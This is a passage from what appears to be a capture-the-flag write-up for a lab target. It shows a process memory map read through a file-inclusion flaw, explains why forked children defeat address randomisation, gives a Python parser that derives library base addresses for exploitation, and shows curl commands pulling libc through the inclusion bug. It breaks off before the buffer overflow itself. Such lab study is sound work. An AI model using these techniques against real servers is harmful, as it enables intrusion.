7f9ed28ac000-7f9ed28bb000 r--p 00000000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed28bb000-7f9ed2955000 r-xp 0000f000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed2955000-7f9ed29ee000 r--p 000a9000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed29ee000-7f9ed29ef000 r--p 00141000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed29ef000-7f9ed29f0000 rw-p 00142000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed29f0000-7f9ed2a15000 r--p 00000000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2a15000-7f9ed2b60000 r-xp 00025000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2b60000-7f9ed2baa000 r--p 00170000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2baa000-7f9ed2bab000 ---p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2bab000-7f9ed2bae000 r--p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2bae000-7f9ed2bb1000 rw-p 001bd000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2bb1000-7f9ed2bb5000 rw-p 00000000 00:00 0
7f9ed2bb5000-7f9ed2bc5000 r--p 00000000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2bc5000-7f9ed2cbd000 r-xp 00010000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2cbd000-7f9ed2cf1000 r--p 00108000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2cf1000-7f9ed2cf5000 r--p 0013b000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2cf5000-7f9ed2cf8000 rw-p 0013f000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2cf8000-7f9ed2cfa000 rw-p 00000000 00:00 0
7f9ed2cff000-7f9ed2d00000 r--p 00000000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d00000-7f9ed2d20000 r-xp 00001000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d20000-7f9ed2d28000 r--p 00021000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d29000-7f9ed2d2a000 r--p 00029000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d2a000-7f9ed2d2b000 rw-p 0002a000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d2b000-7f9ed2d2c000 rw-p 00000000 00:00 0
7ffd40921000-7ffd40942000 rw-p 00000000 00:00 0 [stack]
7ffd40974000-7ffd40978000 r--p 00000000 00:00 0 [vvar]
7ffd40978000-7ffd4097a000 r-xp 00000000 00:00 0 [vdso]

These maps belong to the parent listener (PID 423). Since the binary fork()s a child for every connection and a child inherits its parent's address space unchanged, every child shares exactly these base addresses: ASLR and PIE only pick new ones when the parent itself is restarted. So we do not need an information leak at all, the LFI is our leak. Moreover, the maps name the exact library builds in use (libc-2.31.so, libsqlite3.so.0.8.6), so we can download the very same files through the LFI instead of guessing a libc version.
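To turn the dump into usable addresses, here is a parser added for this write-up (not part of the original post, and not pwntools): it reads /proc/<PID>/maps rows, takes the lowest mapping with file offset 0 as each object's load base, confirms the stack is non-executable, and rebases an ELF offset into the target process. The sample rows are copied from the dump above; the only assumption is the standard maps layout of address range, permissions, offset, device, inode and path. The offsets to add to these bases (symbols, gadgets, the binary's own functions) come from the downloaded activate_license and libc-2.31.so files, for instance via pwntools' ELF().symbols.

```python
import re

# Copied from the /proc/423/maps dump above (a subset of the regions, same layout).
SAMPLE_MAPS = """\
5583d20bf000-5583d20c0000 r--p 00000000 08:01 2408 /usr/bin/activate_license
5583d20c0000-5583d20c1000 r-xp 00001000 08:01 2408 /usr/bin/activate_license
5583d20c1000-5583d20c2000 r--p 00002000 08:01 2408 /usr/bin/activate_license
5583d20c2000-5583d20c3000 r--p 00002000 08:01 2408 /usr/bin/activate_license
5583d20c3000-5583d20c4000 rw-p 00003000 08:01 2408 /usr/bin/activate_license
5583d3b11000-5583d3b32000 rw-p 00000000 00:00 0 [heap]
7f9ed2882000-7f9ed2884000 rw-p 00000000 00:00 0
7f9ed29f0000-7f9ed2a15000 r--p 00000000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2a15000-7f9ed2b60000 r-xp 00025000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2b60000-7f9ed2baa000 r--p 00170000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2baa000-7f9ed2bab000 ---p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2bab000-7f9ed2bae000 r--p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2bae000-7f9ed2bb1000 rw-p 001bd000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2bb5000-7f9ed2bc5000 r--p 00000000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2bc5000-7f9ed2cbd000 r-xp 00010000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2cff000-7f9ed2d00000 r--p 00000000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d00000-7f9ed2d20000 r-xp 00001000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7ffd40921000-7ffd40942000 rw-p 00000000 00:00 0 [stack]
7ffd40978000-7ffd4097a000 r-xp 00000000 00:00 0 [vdso]
"""

# start-end perms offset dev inode [path]; the path is absent for anonymous mappings.
MAPS_ROW = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+([rwxps-]{4})\s+([0-9a-f]+)\s+(\S+)\s+(\d+)\s*(.*)$"
)


def parse_maps(text):
    """Return one dict per mapping, with addresses and the file offset as integers."""
    regions = []
    for line in text.splitlines():
        m = MAPS_ROW.match(line)
        if not m:
            continue
        start, end, perms, offset, dev, inode, path = m.groups()
        regions.append({
            "start": int(start, 16), "end": int(end, 16), "perms": perms,
            "offset": int(offset, 16), "dev": dev, "inode": int(inode),
            "path": path.strip(),
        })
    return regions


def base_addresses(regions):
    """Load base of every file-backed object: the lowest mapping whose file offset is 0.
    ELF symbol and gadget offsets are relative to this address."""
    bases = {}
    for r in regions:
        if r["inode"] == 0 or r["offset"] != 0:
            continue  # anonymous regions ([heap], [stack], ...) and non-zero file offsets
        bases[r["path"]] = min(bases.get(r["path"], r["start"]), r["start"])
    return bases


def find_base(bases, needle):
    """Pick one base by a substring of its path ('libc-2.31', 'activate_license', ...)."""
    hits = [base for path, base in bases.items() if needle in path]
    if len(hits) != 1:
        raise LookupError(f"{needle!r} matched {len(hits)} objects")
    return hits[0]


def rebase(bases, needle, offset):
    """Absolute address in the target process of an offset inside the named object."""
    return find_base(bases, needle) + offset


def executable_regions(regions):
    """Where code can actually run: with NX on, only the r-x segments of loaded objects."""
    return [r for r in regions if "x" in r["perms"]]


def stack_is_nx(regions):
    """True when every [stack] mapping lacks the execute bit (checksec's NX in practice)."""
    stacks = [r for r in regions if r["path"] == "[stack]"]
    return bool(stacks) and all("x" not in r["perms"] for r in stacks)


if __name__ == "__main__":
    regions = parse_maps(SAMPLE_MAPS)
    for path, base in base_addresses(regions).items():
        print(f"{base:#x} {path}")
    print("stack NX:", stack_is_nx(regions))
    # e.g. rebase(bases, "libc-2.31", libc.symbols["system"]) with libc = pwntools ELF("libc-2.31.so")
```

Every base must be page-aligned; if one is not, the regex swallowed a column and the parse is wrong. Re-reading /proc/423/maps right before sending the payload is cheap and guards against the listener having been restarted since the first dump.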

> curl http://10.10.11.154/index.php?page=/usr/lib/x86_64-linux-gnu/libc-2.31.so --output libc-2.31.so
> curl http://10.10.11.154/index.php?page=/usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 --output libsqlite3.so.0.8.6

Now, we are set to perform BOF. Let's fire up pwntools.